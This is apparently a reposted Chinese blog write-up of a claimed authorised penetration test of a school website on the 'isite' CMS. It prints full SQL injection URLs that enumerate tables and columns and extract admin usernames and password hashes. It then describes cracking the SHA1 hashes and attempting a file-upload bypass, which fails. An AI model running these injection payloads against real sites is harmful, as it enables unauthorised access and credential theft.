专栏首页it同路人意外发现一套cms的注入漏洞

意外发现一套cms的注入漏洞

意外发现一套cms的注入漏洞

(说明:此次检测为官方授权检测!!!表情包与文章无关)

正文如下:

事情是这样的某一天在一个安全交流群里聊天,一个朋友说他们老师叫他去检测下他们学校官网,后来朋友他找到了我让我帮助他进行安全检测。

我这么菜,但是还是去看看吧。

首先我们打开主站

访问robots.txt文件,是存在的,可以看出是isite的 cms(在此之前听都没听过….)。

去百度了下看下有啥公开的漏洞吧

不得不说用的人真的少,这些漏洞都试了下都没用。

还是看看后台吧,后面加个 艾德密,得到后台通过各种弱口令,都没结果。

既然这样,从旁站下手好了,查了下,有这么多。

我一个个找过去,结果全是这套程序,很无奈啊。

没办法我硬着头皮看了看主站,随便点了个连接,貌似伪静态啊。试了半天还是放弃了。

继续翻其他站,在一个站的首页发现这个。

尝试下 post 注入,加个单引号。

刚准备放弃….过了几秒钟 自动跳转到到了另一个页面。

继续在搜索框那输入了些查询内容点击检索

Search 后面多了个 24,于是我加一个单引号………居然报错了(头一次人品爆发)。

检测语句:and 1=1 和 and 1=2

返回结果

确定已经存在注入,这次就用手工注入吧。

先 order by 猜下字段长度

http://www.xxx.com/index.php/iss/search/search/24%20order%20by%2010

返回正常

http://www.xxx.com/index.php/iss/search/search/24%20order%20by%2011

返回错误

http://www.xxx.com/index.php/iss/search/search/24%20union%20select%201,2,3,4,5,6,7,8,9,10

结果如下

没有显错位,加个 and 1=2 试试

显错位替换成 database()和 version(),版本是 5.0 以上,有个默认数据库 information

User(),不是 root 权限

接下来查表名

http://www.xxx.com/index.php/iss/search/search/24%20and%201=2%20union%20select%201,group_concat(table_name),3,4,5,6,7,8,9,10%20from%20information_schema.tables%20where%2 0table_schema=0x6462xxxxxxxxxxx70696E6B5F636F6D

(这是数据库的 hex 码,xxx 代表马赛克……)

出来很多啊,用审查元素全部复制下来

flexi_announcement,flexi_bbcode,flexi_channel,flexi_channel_config,flexi_config,flexi_content,flexi_content_subject,flexi_feedback,flexi_file,flexi_file_watermark,flei_inquiry,flexi_link,flexi_link_category,flexi_log,flexi_message,flexi_page,flexi_ search_cache,flexi_tag,flexi_tag_related,flexi_tpl_block,flexi_user,flexi_user_admi n,flexi_u

起初以为是 flexi_user_admin这个表,后来发现帐号密码存在 flexi_user这个表中

接下来查他字段http://www.xxx.com/index.php/iss/search/search/24%20and%201=2%20union%20select%201,group_concat(column_name),3,4,5,6,7,8,9,10%20from%20information_schema.columns%20where%20table_name=0x666C6578695F75736572

id,name,password,hit_question,hit_answer,email,real_name,gender,birthday,province,address,post_code,phone_code,mphone_code,group_id,reg_time,last_login_time,last_login_ip,login_count,post_count,manager,locked,new_msg_count,memo

经验判断存放帐号密码的字段是 name和password

http://www.xxx.com/index.php/iss/search/search/24%20and%201=2%20union%20select%201,name,3,4,5,6,7,password,9,10%20from%20flexi_user

就这样,帐号密码已经出来了 利用构造出来的 exp:

index.php/iss/search/search/24%20and%201=2%20union%20select%201,name,3,4,5,6,7,password,9,10%20from%20flexi_user

去主站访问下

哈哈!!帐号PASS到手,但是我数了一下是40位…….

然后去百度看了看

说是 md5的然后我仔细看了看文章…..

好像并没有用,然后我去官网下载了套源码 查看代码发现是 sha1 加密。

拿起密码就去某MD5解密,悲剧来了………

试了试另外一个,也是一样的结果…..

然后看了看其他网站(SOMD5),可能真的人品爆发,有个站解密成功了然后登录之。

大概看了看网站后台,在这添加上 php

找到个上传文件的地方,感觉 鞋奥 就在眼前

点击上传发现…………我真是个命苦的人啊

只能拿出我苦练多年的打狗头方法…….拿起 burp 抓包

在这里构造畸形的 http,然后放包,成功上传。(自带滑稽表情)

点击放大镜

源码暴露了,而且路径也不对劲…….

看来这并不是他真实路径,我们又翻了翻,发现了这个,点击检索

看到刚才上传的文件,点击源文件路径变成了,多了个下划线……. http://www.xxx.com/data/upload/2017-04/08215611_edit._php

这个问题卡了我两天,各种姿势都试了,还是没办法绕过,所以放弃了。

Ps:这个提供这套 cms 的站点也存在该漏漏

作者:IT同路人 (文章转载请注明来自:IT同路人论坛)

本文分享自微信公众号 - it同路人(ittongluren)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2019-06-09

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 爬虫篇 | Python学习之Scrapy-Redis实战京东图书

    scrapy-Redis就是结合了分布式数据库redis,重写了scrapy一些比较关键的代码,将scrapy变成一个可以在多个主机上同时运行的分布式爬虫。

    叫我龙总
  • 爬取搞笑视频

    最近小编经常刷知乎上的一个问题“你见过哪些是「以为是个王者,结果是个青铜」的视频或图片?”。从这个问题我们就已经可以看出来里面的幽默成分了,点进去看果然是笑到停...

    HuangWeiAI
  • SpringBoot整合mybatis一直失败差不到数据,解决方案

    版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 ...

    多凡
  • Centos7源码编译安装PHP7.2(生产环境)

    注:本文转自详解Centos7源码编译安装 php7.2之生产篇,如需转载请注明出处https://www.cnblogs.com/zhuchenglin/p/...

    lin_zone
  • 3.2.9 、Google Tag Manager实战指南——广告参数传递

    通常需要区分不同渠道来源的时候一般会使用UTM标记,其实还有另一种方式可以传递广告参数,这个需要使用GTM,同时配合自定义维度来使用。

    GA小站
  • Spring Boot 开发微信公众号后台,看看松哥公众号后台是怎么实现的!

    Hello 各位小伙伴,松哥今天要和大家聊一个有意思的话题,就是使用 Spring Boot 开发微信公众号后台。

    江南一点雨
  • 3.2.8 、Google Tag Manager实战指南——虚拟页面跟踪单页应用

    单页应用就是指浏览器访问站点的时候,使用期间不会重新加载页面,给用户的看到的是所有URL就是一样的,有体验原生APP的感觉,这是一种从Web服务器加载的富客户端...

    GA小站
  • cas-client单点登录客户端拦截请求和忽略/排除不需要拦截的请求URL的问题

    版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 ...

    eguid
  • Mitaka:针对开源情报收集任务的浏览器扩展

    今天给大家介绍的是一款针对开源情报收集任务的浏览器扩展,这款扩展名叫Mitaka,希望该工具可以给广大研究人员的OSINT搜索研究提供帮助。

    FB客服
  • SpringMVC @RequestMapping 注解

    版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 ...

    多凡

扫码关注云+社区

领取腾讯云代金券